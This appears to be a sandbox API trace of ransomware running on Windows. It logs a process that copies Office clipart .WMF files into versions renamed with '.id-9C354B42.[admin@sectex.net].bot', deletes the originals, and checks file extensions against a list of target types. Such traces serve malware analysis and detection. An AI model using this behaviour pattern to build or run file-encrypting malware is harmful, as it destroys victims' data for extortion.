	[0149.173] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00116_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00116_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0149.174] GetLastError () returned 0x0
	[0149.174] ReadFile (in: hFile=0x2a0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x3dec, lpOverlapped=0x0) returned 1
	[0149.176] WriteFile (in: hFile=0x3d0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x3df0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x3df0, lpOverlapped=0x0) returned 1
	[0149.177] ReadFile (in: hFile=0x2a0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.177] WriteFile (in: hFile=0x3d0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0149.177] SetEndOfFile (hFile=0x3d0) returned 1
	[0149.177] CloseHandle (hObject=0x3d0) returned 1
	[0149.177] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.177] SetEndOfFile (hFile=0x2a0) returned 1
	[0149.179] CloseHandle (hObject=0x2a0) returned 1
	[0149.179] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00116_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.179] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00116_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00116_.wmf")) returned 1
	[0149.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00116_.WMF") returned 63
	[0149.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00116_.WMF") returned 63
	[0149.180] lstrlenW (lpString=".doc") returned 4
	[0149.180] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.180] lstrlenW (lpString=".docx") returned 5
	[0149.180] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.180] lstrlenW (lpString=".pdf") returned 4
	[0149.180] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.180] lstrlenW (lpString=".xls") returned 4
	[0149.180] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.180] lstrlenW (lpString=".xlsx") returned 5
	[0149.180] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.180] lstrlenW (lpString=".ppt") returned 4
	[0149.180] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00116_.WMF") returned 63
	[0149.180] lstrlenW (lpString=".zip") returned 4
	[0149.180] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.181] lstrlenW (lpString=".rar") returned 4
	[0149.181] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.181] lstrlenW (lpString=".bz2") returned 4
	[0149.181] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.181] lstrlenW (lpString=".7z") returned 3
	[0149.181] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.181] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00116_.WMF") returned 63
	[0149.181] lstrlenW (lpString=".dbf") returned 4
	[0149.181] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.181] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00116_.WMF") returned 63
	[0149.181] lstrlenW (lpString=".1cd") returned 4
	[0149.181] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.181] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00116_.WMF") returned 63
	[0149.181] lstrlenW (lpString=".jpg") returned 4
	[0149.181] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.181] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00116_.WMF") returned 63
	[0149.181] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00116_.WMF") returned 63
	[0149.181] lstrlenW (lpString=".doc") returned 4
	[0149.181] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.181] lstrlenW (lpString=".docx") returned 5
	[0149.181] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.181] lstrlenW (lpString=".pdf") returned 4
	[0149.181] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.181] lstrlenW (lpString=".xls") returned 4
	[0149.181] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.181] lstrlenW (lpString=".xlsx") returned 5
	[0149.181] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.181] lstrlenW (lpString=".ppt") returned 4
	[0149.181] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.181] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00116_.WMF") returned 63
	[0149.182] lstrlenW (lpString=".zip") returned 4
	[0149.182] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.182] lstrlenW (lpString=".rar") returned 4
	[0149.182] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.182] lstrlenW (lpString=".bz2") returned 4
	[0149.182] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.182] lstrlenW (lpString=".7z") returned 3
	[0149.182] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00116_.WMF") returned 63
	[0149.182] lstrlenW (lpString=".dbf") returned 4
	[0149.182] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00116_.WMF") returned 63
	[0149.182] lstrlenW (lpString=".1cd") returned 4
	[0149.182] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00116_.WMF") returned 63
	[0149.182] lstrlenW (lpString=".jpg") returned 4
	[0149.182] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.182] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0149.182] lstrlenW (lpString="HM00172_.WMF") returned 12
	[0149.182] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00172_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00172_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0149.183] GetFileSizeEx (in: hFile=0x2a0, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=2832) returned 1
	[0149.183] CloseHandle (hObject=0x2a0) returned 1
	[0149.183] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00172_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00172_.wmf")) returned 0x20
	[0149.183] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00172_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00172_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.183] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00172_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00172_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0149.183] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.183] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.183] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00172_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00172_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0149.184] GetLastError () returned 0x0
	[0149.184] ReadFile (in: hFile=0x2a0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0xb10, lpOverlapped=0x0) returned 1
	[0149.443] WriteFile (in: hFile=0x3d0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xb20, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xb20, lpOverlapped=0x0) returned 1
	[0149.443] ReadFile (in: hFile=0x2a0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.444] WriteFile (in: hFile=0x3d0, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0149.444] SetEndOfFile (hFile=0x3d0) returned 1
	[0149.444] CloseHandle (hObject=0x3d0) returned 1
	[0149.444] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.444] SetEndOfFile (hFile=0x2a0) returned 1
	[0149.446] CloseHandle (hObject=0x2a0) returned 1
	[0149.446] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00172_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.446] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00172_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00172_.wmf")) returned 1
	[0149.447] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00172_.WMF") returned 63
	[0149.447] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00172_.WMF") returned 63
	[0149.447] lstrlenW (lpString=".doc") returned 4
	[0149.447] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.447] lstrlenW (lpString=".docx") returned 5
	[0149.447] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.447] lstrlenW (lpString=".pdf") returned 4
	[0149.447] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.447] lstrlenW (lpString=".xls") returned 4
	[0149.447] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.447] lstrlenW (lpString=".xlsx") returned 5
	[0149.447] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.448] lstrlenW (lpString=".ppt") returned 4
	[0149.448] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.448] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00172_.WMF") returned 63
	[0149.448] lstrlenW (lpString=".zip") returned 4
	[0149.448] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.448] lstrlenW (lpString=".rar") returned 4
	[0149.448] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.448] lstrlenW (lpString=".bz2") returned 4
	[0149.448] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.448] lstrlenW (lpString=".7z") returned 3
	[0149.448] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.448] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00172_.WMF") returned 63
	[0149.448] lstrlenW (lpString=".dbf") returned 4
	[0149.448] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.448] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00172_.WMF") returned 63
	[0149.448] lstrlenW (lpString=".1cd") returned 4
	[0149.448] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.448] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00172_.WMF") returned 63
	[0149.448] lstrlenW (lpString=".jpg") returned 4
	[0149.448] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.448] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00172_.WMF") returned 63
	[0149.448] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00172_.WMF") returned 63
	[0149.448] lstrlenW (lpString=".doc") returned 4
	[0149.448] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.448] lstrlenW (lpString=".docx") returned 5
	[0149.448] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.448] lstrlenW (lpString=".pdf") returned 4
	[0149.448] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.448] lstrlenW (lpString=".xls") returned 4
	[0149.448] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.448] lstrlenW (lpString=".xlsx") returned 5
	[0149.449] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.449] lstrlenW (lpString=".ppt") returned 4
	[0149.449] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00172_.WMF") returned 63
	[0149.449] lstrlenW (lpString=".zip") returned 4
	[0149.449] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.449] lstrlenW (lpString=".rar") returned 4
	[0149.449] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.449] lstrlenW (lpString=".bz2") returned 4
	[0149.449] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.449] lstrlenW (lpString=".7z") returned 3
	[0149.449] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00172_.WMF") returned 63
	[0149.449] lstrlenW (lpString=".dbf") returned 4
	[0149.449] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00172_.WMF") returned 63
	[0149.449] lstrlenW (lpString=".1cd") returned 4
	[0149.449] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00172_.WMF") returned 63
	[0149.449] lstrlenW (lpString=".jpg") returned 4
	[0149.449] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.449] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0149.449] lstrlenW (lpString="IN00346_.WMF") returned 12
	[0149.449] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00346_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00346_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4
	[0149.467] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=696) returned 1
	[0149.467] CloseHandle (hObject=0x3f4) returned 1
	[0149.467] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00346_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00346_.wmf")) returned 0x20
	[0149.527] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00346_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00346_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.527] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00346_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00346_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8
	[0149.527] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.527] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.527] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00346_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00346_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc
	[0149.528] GetLastError () returned 0x0
	[0149.528] ReadFile (in: hFile=0x3f8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x2b8, lpOverlapped=0x0) returned 1
	[0149.529] WriteFile (in: hFile=0x3fc, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x2c0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x2c0, lpOverlapped=0x0) returned 1
	[0149.530] ReadFile (in: hFile=0x3f8, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.530] WriteFile (in: hFile=0x3fc, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0149.530] SetEndOfFile (hFile=0x3fc) returned 1
	[0149.530] CloseHandle (hObject=0x3fc) returned 1
	[0149.530] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.530] SetEndOfFile (hFile=0x3f8) returned 1
	[0149.532] CloseHandle (hObject=0x3f8) returned 1
	[0149.532] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00346_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.533] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00346_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00346_.wmf")) returned 1
	[0149.533] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00346_.WMF") returned 63
	[0149.533] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00346_.WMF") returned 63
	[0149.533] lstrlenW (lpString=".doc") returned 4
	[0149.533] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.533] lstrlenW (lpString=".docx") returned 5
	[0149.533] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.534] lstrlenW (lpString=".pdf") returned 4
	[0149.534] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.534] lstrlenW (lpString=".xls") returned 4
	[0149.534] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.534] lstrlenW (lpString=".xlsx") returned 5
	[0149.534] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.534] lstrlenW (lpString=".ppt") returned 4
	[0149.534] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.534] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00346_.WMF") returned 63
	[0149.534] lstrlenW (lpString=".zip") returned 4
	[0149.534] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.534] lstrlenW (lpString=".rar") returned 4
	[0149.534] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.534] lstrlenW (lpString=".bz2") returned 4
	[0149.534] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.534] lstrlenW (lpString=".7z") returned 3
	[0149.534] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.534] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00346_.WMF") returned 63
	[0149.534] lstrlenW (lpString=".dbf") returned 4
	[0149.534] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.534] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00346_.WMF") returned 63
	[0149.534] lstrlenW (lpString=".1cd") returned 4
	[0149.534] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.534] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00346_.WMF") returned 63
	[0149.534] lstrlenW (lpString=".jpg") returned 4
	[0149.534] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.534] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00346_.WMF") returned 63
	[0149.534] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00346_.WMF") returned 63
	[0149.534] lstrlenW (lpString=".doc") returned 4
	[0149.535] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0149.535] lstrlenW (lpString=".docx") returned 5
	[0149.535] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0149.535] lstrlenW (lpString=".pdf") returned 4
	[0149.535] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0149.535] lstrlenW (lpString=".xls") returned 4
	[0149.535] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0149.535] lstrlenW (lpString=".xlsx") returned 5
	[0149.535] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0149.535] lstrlenW (lpString=".ppt") returned 4
	[0149.535] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0149.535] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00346_.WMF") returned 63
	[0149.535] lstrlenW (lpString=".zip") returned 4
	[0149.535] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0149.535] lstrlenW (lpString=".rar") returned 4
	[0149.535] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0149.535] lstrlenW (lpString=".bz2") returned 4
	[0149.535] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0149.535] lstrlenW (lpString=".7z") returned 3
	[0149.535] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0149.535] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00346_.WMF") returned 63
	[0149.535] lstrlenW (lpString=".dbf") returned 4
	[0149.535] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0149.535] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00346_.WMF") returned 63
	[0149.535] lstrlenW (lpString=".1cd") returned 4
	[0149.535] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0149.535] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00346_.WMF") returned 63
	[0149.535] lstrlenW (lpString=".jpg") returned 4
	[0149.535] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0149.536] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0149.536] lstrlenW (lpString="IN00557_.WMF") returned 12
	[0149.536] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00557_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00557_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8
	[0149.536] GetFileSizeEx (in: hFile=0x3f8, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=9172) returned 1
	[0149.536] CloseHandle (hObject=0x3f8) returned 1
	[0149.536] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00557_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00557_.wmf")) returned 0x20
	[0149.536] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00557_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00557_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.536] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\IN00557_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\in00557_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8
	[0149.537] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.537] SetFilePointerEx (in: hFile=0x3f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
